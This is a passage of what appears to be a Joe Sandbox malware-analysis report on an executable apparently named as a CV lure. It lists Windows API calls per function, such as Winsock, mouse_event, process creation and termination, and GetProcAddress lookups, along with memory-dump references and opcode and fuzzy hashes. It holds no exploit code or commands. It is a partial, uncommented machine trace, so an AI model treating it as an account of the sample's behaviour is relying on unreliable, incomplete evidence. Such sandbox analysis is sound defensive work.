                                                                                        • GetMenuItemCount.USER32(000000FF), ref: 003C4C0D
                                                                                        • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 003C4C3E
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                        • String ID:
                                                                                        • API String ID: 3311875123-0
                                                                                        • Opcode ID: 766b66b937175bb7354684f5b8b61746d7eb4b9edf0ec7415b9d98b033c284a1
                                                                                        • Instruction ID: eb7025bde1cebda32a0ad5f2e73a231a247ae6cb494f2d345d45e1f978656c98
                                                                                        • Opcode Fuzzy Hash: 766b66b937175bb7354684f5b8b61746d7eb4b9edf0ec7415b9d98b033c284a1
                                                                                        • Instruction Fuzzy Hash: 0B51CE70A01209EBDF26CFA8C998FADBBF4AF44318F14816DE855DB2A1E3709D44CB51
                                                                                        APIs
                                                                                        • select.WSOCK32(00000000,00000001,00000000,00000000,?,000003E8,0041DC00), ref: 003D8E7C
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D8E89
                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001,00000000), ref: 003D8EAD
                                                                                        • #16.WSOCK32(?,?,00000000,00000000), ref: 003D8EC5
                                                                                        • _strlen.LIBCMT ref: 003D8EF7
                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 003D8F6A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$_strlenselect
                                                                                        • String ID:
                                                                                        • API String ID: 2217125717-0
                                                                                        • Opcode ID: 14d8e3cf8e511f1c2166b46bbd5080121d47ac51dba7b05934fe32c713c96297
                                                                                        • Instruction ID: 678f2961fb1abd20e611363566c9035c7cb2f04fdcc6e9fccd12c3e65417fd37
                                                                                        • Opcode Fuzzy Hash: 14d8e3cf8e511f1c2166b46bbd5080121d47ac51dba7b05934fe32c713c96297
                                                                                        • Instruction Fuzzy Hash: 8B418772900204AFCB16EBA4DD95EAEB7BDEF48314F10459AF5169B2D1DF30AE44CB60
                                                                                        APIs
                                                                                          • Part of subcall function 0039B34E: GetWindowLongW.USER32(?,000000EB), ref: 0039B35F
                                                                                        • BeginPaint.USER32(?,?,?), ref: 0039AC2A
                                                                                        • GetWindowRect.USER32(?,?), ref: 0039AC8E
                                                                                        • ScreenToClient.USER32(?,?), ref: 0039ACAB
                                                                                        • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 0039ACBC
                                                                                        • EndPaint.USER32(?,?,?,?,?), ref: 0039AD06
                                                                                        • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 003FE673
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: PaintWindow$BeginClientLongRectRectangleScreenViewport
                                                                                        • String ID:
                                                                                        • API String ID: 2592858361-0
                                                                                        • Opcode ID: 36c62b65d20d5aec419a2836ea2f5a37801dff0eb18893e9ea30ebb33ce413e2
                                                                                        • Instruction ID: bfe6c6eb86eebb0fd12d43185aecc0423be7deff7c9bdc75d1f0b97b2adbbd9c
                                                                                        • Opcode Fuzzy Hash: 36c62b65d20d5aec419a2836ea2f5a37801dff0eb18893e9ea30ebb33ce413e2
                                                                                        • Instruction Fuzzy Hash: 7B41D2715047049FDB12DF24DC84F7A7BA8EB59320F040729FAA4CB2B1C7319884DBA2
                                                                                        APIs
                                                                                        • ShowWindow.USER32(00441628,00000000,00441628,00000000,00000000,00441628,?,003FDC5D,00000000,?,00000000,00000000,00000000,?,003FDAD1,00000004), ref: 003EE40B
                                                                                        • EnableWindow.USER32(00000000,00000000), ref: 003EE42F
                                                                                        • ShowWindow.USER32(00441628,00000000), ref: 003EE48F
                                                                                        • ShowWindow.USER32(00000000,00000004), ref: 003EE4A1
                                                                                        • EnableWindow.USER32(00000000,00000001), ref: 003EE4C5
                                                                                        • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 003EE4E8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Show$Enable$MessageSend
                                                                                        • String ID:
                                                                                        • API String ID: 642888154-0
                                                                                        • Opcode ID: e64f32baee13dd661761adf9f9756f69ac56baa5ce707d45caef7938ad8fd069
                                                                                        • Instruction ID: 6b988e85c720339f53b79078a61027de17cb0796356d5ad0689496f2e6646f29
                                                                                        • Opcode Fuzzy Hash: e64f32baee13dd661761adf9f9756f69ac56baa5ce707d45caef7938ad8fd069
                                                                                        • Instruction Fuzzy Hash: 6B4171306015A0EFDB22CF66C599B947BE1BF09304F5942B9EA589F2E2C731A846CF51
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,000001F5), ref: 003C98D1
                                                                                          • Part of subcall function 0039F4EA: std::exception::exception.LIBCMT ref: 0039F51E
                                                                                          • Part of subcall function 0039F4EA: __CxxThrowException@8.LIBCMT ref: 0039F533
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,?,00000000), ref: 003C9908
                                                                                        • EnterCriticalSection.KERNEL32(?), ref: 003C9924
                                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 003C999E
                                                                                        • ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 003C99B3
                                                                                        • InterlockedExchange.KERNEL32(?,000001F6), ref: 003C99D2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeFileInterlockedReadSection$EnterException@8LeaveThrowstd::exception::exception
                                                                                        • String ID:
                                                                                        • API String ID: 2537439066-0
                                                                                        • Opcode ID: d747741c575ea269e7dfbe8a3cb5e50c8d85a76e3174c30f7339bcd4570c7966
                                                                                        • Instruction ID: df6708109a6b7efaf1c21cb6f314e233fbf0a83db27981dfd5675e1d59d79f09
                                                                                        • Opcode Fuzzy Hash: d747741c575ea269e7dfbe8a3cb5e50c8d85a76e3174c30f7339bcd4570c7966
                                                                                        • Instruction Fuzzy Hash: 36316D31900205EBDF01AFA5DD89EAAB778FF45310B1580B9E905EA246DB70DE14DBA4
                                                                                        APIs
                                                                                        • GetForegroundWindow.USER32(?,?,?,?,?,?,003D77F4,?,?,00000000,00000001), ref: 003D9B53
                                                                                          • Part of subcall function 003D6544: GetWindowRect.USER32(?,?), ref: 003D6557
                                                                                        • GetDesktopWindow.USER32 ref: 003D9B7D
                                                                                        • GetWindowRect.USER32(00000000), ref: 003D9B84
                                                                                        • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 003D9BB6
                                                                                          • Part of subcall function 003C7A58: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 003C7AD0
                                                                                        • GetCursorPos.USER32(?), ref: 003D9BE2
                                                                                        • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 003D9C44
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                        • String ID:
                                                                                        • API String ID: 4137160315-0
                                                                                        • Opcode ID: 5131daa32cc18c1153aae8d29088d68e7fd8dc77508981dd05be691b18d1343b
                                                                                        • Instruction ID: b1e7980b89b50ed30b1d5148454a962d5e7ec5019633fd1f9494ddf82af9bbb5
                                                                                        • Opcode Fuzzy Hash: 5131daa32cc18c1153aae8d29088d68e7fd8dc77508981dd05be691b18d1343b
                                                                                        • Instruction Fuzzy Hash: A331C072504305ABC710DF68EC49F9AB7E9FF89314F01092BF995E7281D671E908CB91
                                                                                        APIs
                                                                                        • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 003BAFAE
                                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 003BAFB5
                                                                                        • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 003BAFC4
                                                                                        • CloseHandle.KERNEL32(00000004), ref: 003BAFCF
                                                                                        • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 003BAFFE
                                                                                        • DestroyEnvironmentBlock.USERENV(00000000), ref: 003BB012
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                        • String ID:
                                                                                        • API String ID: 1413079979-0
                                                                                        • Opcode ID: 5fe55f7758814fd14febd6eb845dcc4287cd8baefc43d8d63f90ee9a0cb3db51
                                                                                        • Instruction ID: 54a79dee9bcd70cfaea99a4fc1754e849d3680dc6aceacf199a337cf53e5fa66
                                                                                        • Opcode Fuzzy Hash: 5fe55f7758814fd14febd6eb845dcc4287cd8baefc43d8d63f90ee9a0cb3db51
                                                                                        • Instruction Fuzzy Hash: 6E2149B2504A09ABDB029FA4DE09BEE7BA9AB44308F054025FA01A6561C376DD25EB61
                                                                                        APIs
                                                                                          • Part of subcall function 0039AF83: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0039AFE3
                                                                                          • Part of subcall function 0039AF83: SelectObject.GDI32(?,00000000), ref: 0039AFF2
                                                                                          • Part of subcall function 0039AF83: BeginPath.GDI32(?), ref: 0039B009
                                                                                          • Part of subcall function 0039AF83: SelectObject.GDI32(?,00000000), ref: 0039B033
                                                                                        • MoveToEx.GDI32(00000000,-00000002,?,00000000), ref: 003EEC20
                                                                                        • LineTo.GDI32(00000000,00000003,?), ref: 003EEC34
                                                                                        • MoveToEx.GDI32(00000000,00000000,?,00000000), ref: 003EEC42
                                                                                        • LineTo.GDI32(00000000,00000000,?), ref: 003EEC52
                                                                                        • EndPath.GDI32(00000000), ref: 003EEC62
                                                                                        • StrokePath.GDI32(00000000), ref: 003EEC72
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                        • String ID:
                                                                                        • API String ID: 43455801-0
                                                                                        • Opcode ID: a5bd7c89049c2708934cf1a00b3b890ab6853b459036e19013ff73bf53562727
                                                                                        • Instruction ID: bc1e3bd65101ceafdbeb7055ffb232de7b42b85fbe2a3bac318b94cdb33988e1
                                                                                        • Opcode Fuzzy Hash: a5bd7c89049c2708934cf1a00b3b890ab6853b459036e19013ff73bf53562727
                                                                                        • Instruction Fuzzy Hash: 6811097640015DBFEF029F90DD88EEA7F6DEB08354F048122FE0999160D7719D59DBA4
                                                                                        APIs
                                                                                        • GetDC.USER32(00000000), ref: 003BE1C0
                                                                                        • GetDeviceCaps.GDI32(00000000,00000058), ref: 003BE1D1
                                                                                        • GetDeviceCaps.GDI32(00000000,0000005A), ref: 003BE1D8
                                                                                        • ReleaseDC.USER32(00000000,00000000), ref: 003BE1E0
                                                                                        • MulDiv.KERNEL32(000009EC,?,00000000), ref: 003BE1F7
                                                                                        • MulDiv.KERNEL32(000009EC,?,?), ref: 003BE209
                                                                                          • Part of subcall function 003B9AA3: RaiseException.KERNEL32(-C0000018,00000001,00000000,00000000,003B9A05,00000000,00000000,?,003B9DDB), ref: 003BA53A
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CapsDevice$ExceptionRaiseRelease
                                                                                        • String ID:
                                                                                        • API String ID: 603618608-0
                                                                                        • Opcode ID: c4162443daa25568e082e164997911cbc76e533f64d64b5ff426da8a8a282bc9
                                                                                        • Instruction ID: 77c5e1128748b966dc9c3d8243ad4f6f98d5ecde3df6ba8c6e5102f2d5622812
                                                                                        • Opcode Fuzzy Hash: c4162443daa25568e082e164997911cbc76e533f64d64b5ff426da8a8a282bc9
                                                                                        • Instruction Fuzzy Hash: F40184B5E00214BFEB109BE5CD45F9EBFB8EB48355F004066EA04AB290D6719C00CBA0
                                                                                        APIs
                                                                                        • __init_pointers.LIBCMT ref: 003A7B47
                                                                                          • Part of subcall function 003A123A: __initp_misc_winsig.LIBCMT ref: 003A125E
                                                                                          • Part of subcall function 003A123A: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 003A7F51
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 003A7F65
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 003A7F78
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 003A7F8B
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 003A7F9E
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 003A7FB1
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 003A7FC4
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 003A7FD7
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 003A7FEA
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 003A7FFD
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 003A8010
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 003A8023
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 003A8036
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 003A8049
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 003A805C
                                                                                          • Part of subcall function 003A123A: GetProcAddress.KERNEL32(00000000,FlushProcessWriteBuffers), ref: 003A806F
                                                                                        • __mtinitlocks.LIBCMT ref: 003A7B4C
                                                                                          • Part of subcall function 003A7E23: InitializeCriticalSectionAndSpinCount.KERNEL32(0043AC68,00000FA0,?,?,003A7B51,003A5E77,00436C70,00000014), ref: 003A7E41
                                                                                        • __mtterm.LIBCMT ref: 003A7B55
                                                                                          • Part of subcall function 003A7BBD: DeleteCriticalSection.KERNEL32(00000000,00000000,?,?,003A7B5A,003A5E77,00436C70,00000014), ref: 003A7D3F
                                                                                          • Part of subcall function 003A7BBD: _free.LIBCMT ref: 003A7D46
                                                                                          • Part of subcall function 003A7BBD: DeleteCriticalSection.KERNEL32(0043AC68,?,?,003A7B5A,003A5E77,00436C70,00000014), ref: 003A7D68
                                                                                        • __calloc_crt.LIBCMT ref: 003A7B7A
                                                                                        • GetCurrentThreadId.KERNEL32 ref: 003A7BA3
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressProc$CriticalSection$Delete$CountCurrentHandleInitializeModuleSpinThread__calloc_crt__init_pointers__initp_misc_winsig__mtinitlocks__mtterm_free
                                                                                        • String ID:
                                                                                        • API String ID: 2942034483-0
                                                                                        • Opcode ID: 707b5aac247f77e7cb49a6083a150b1c2cbfcb30062283464722cac06e3ff8b3
                                                                                        • Instruction ID: 4a8ec92ab20a5665c6ca0d713c14747d13fdc7e5a1ea1aeef667d8dad8a7cb33
                                                                                        • Opcode Fuzzy Hash: 707b5aac247f77e7cb49a6083a150b1c2cbfcb30062283464722cac06e3ff8b3
                                                                                        • Instruction Fuzzy Hash: BBF0907250D31219EA2B77747C8BA8B2794DF03730F2506A9F8A0DD1D2FF25884141B4
                                                                                        APIs
                                                                                        • MapVirtualKeyW.USER32(0000005B,00000000), ref: 0038281D
                                                                                        • MapVirtualKeyW.USER32(00000010,00000000), ref: 00382825
                                                                                        • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00382830
                                                                                        • MapVirtualKeyW.USER32(000000A1,00000000), ref: 0038283B
                                                                                        • MapVirtualKeyW.USER32(00000011,00000000), ref: 00382843
                                                                                        • MapVirtualKeyW.USER32(00000012,00000000), ref: 0038284B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual
                                                                                        • String ID:
                                                                                        • API String ID: 4278518827-0
                                                                                        • Opcode ID: ca3a1477a98989d72d067cabce248be6c35d39c4d4a5ee07d70abb77e4af3ec9
                                                                                        • Instruction ID: 5bf9556f4e2e7169e6dc6429159f45bf52f4998ea16a72553a738b958f81270c
                                                                                        • Opcode Fuzzy Hash: ca3a1477a98989d72d067cabce248be6c35d39c4d4a5ee07d70abb77e4af3ec9
                                                                                        • Instruction Fuzzy Hash: 600167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C47A42C7F5A868CBE5
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: CriticalExchangeInterlockedSection$EnterLeaveObjectSingleTerminateThreadWait
                                                                                        • String ID:
                                                                                        • API String ID: 1423608774-0
                                                                                        • Opcode ID: 1c04ccceb98fd7509482c8cf59c4b671f55ab3cad21bafde90f99b437dd2c623
                                                                                        • Instruction ID: c72b6bedf2ee485ef5939d3f5ed5158fa8b190f61f3e46682da18772a66c3be3
                                                                                        • Opcode Fuzzy Hash: 1c04ccceb98fd7509482c8cf59c4b671f55ab3cad21bafde90f99b437dd2c623
                                                                                        • Instruction Fuzzy Hash: 21018136902611ABD7162BA4ED4CFEB7769FF88701B06047EF503E60A4DB74AC14DB54
                                                                                        APIs
                                                                                        • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 003C7C07
                                                                                        • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 003C7C1D
                                                                                        • GetWindowThreadProcessId.USER32(?,?), ref: 003C7C2C
                                                                                        • OpenProcess.KERNEL32(001F0FFF,00000000,?,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C7C3B
                                                                                        • TerminateProcess.KERNEL32(00000000,00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C7C45
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,00000010,00000000,00000000,00000002,000001F4,?,?,00000010,00000000,00000000), ref: 003C7C4C
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.1706915956.0000000000381000.00000020.00000001.01000000.00000003.sdmp, Offset: 00380000, based on PE: true
                                                                                        • Associated: 00000000.00000002.1706900576.0000000000380000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000040D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706959442.000000000042E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1706996719.000000000043A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.1707012653.0000000000444000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_380000_CV Lic H&S Olivetti Renzo.jbxd
                                                                                        Similarity
                                                                                        • API ID: Process$Message$CloseHandleOpenPostSendTerminateThreadTimeoutWindow
                                                                                        • String ID:
                                                                                        • API String ID: 839392675-0
                                                                                        • Opcode ID: 87729f00c401547bec0120445566aab875d2168f8df210f0d29409cbd1038fcb
                                                                                        • Instruction ID: 644b2e3a8a90610e3da0999b4bcb251f81002fa28284be48d29be69a7726190d
                                                                                        • Opcode Fuzzy Hash: 87729f00c401547bec0120445566aab875d2168f8df210f0d29409cbd1038fcb
                                                                                        • Instruction Fuzzy Hash: B0F03A72A41158BBE7215B929D0EEEF7F7CEFC6B11F000028FA01E2051DBB15A49D6B9
                                                                                        APIs
                                                                                        • InterlockedExchange.KERNEL32(?,?), ref: 003C9A33
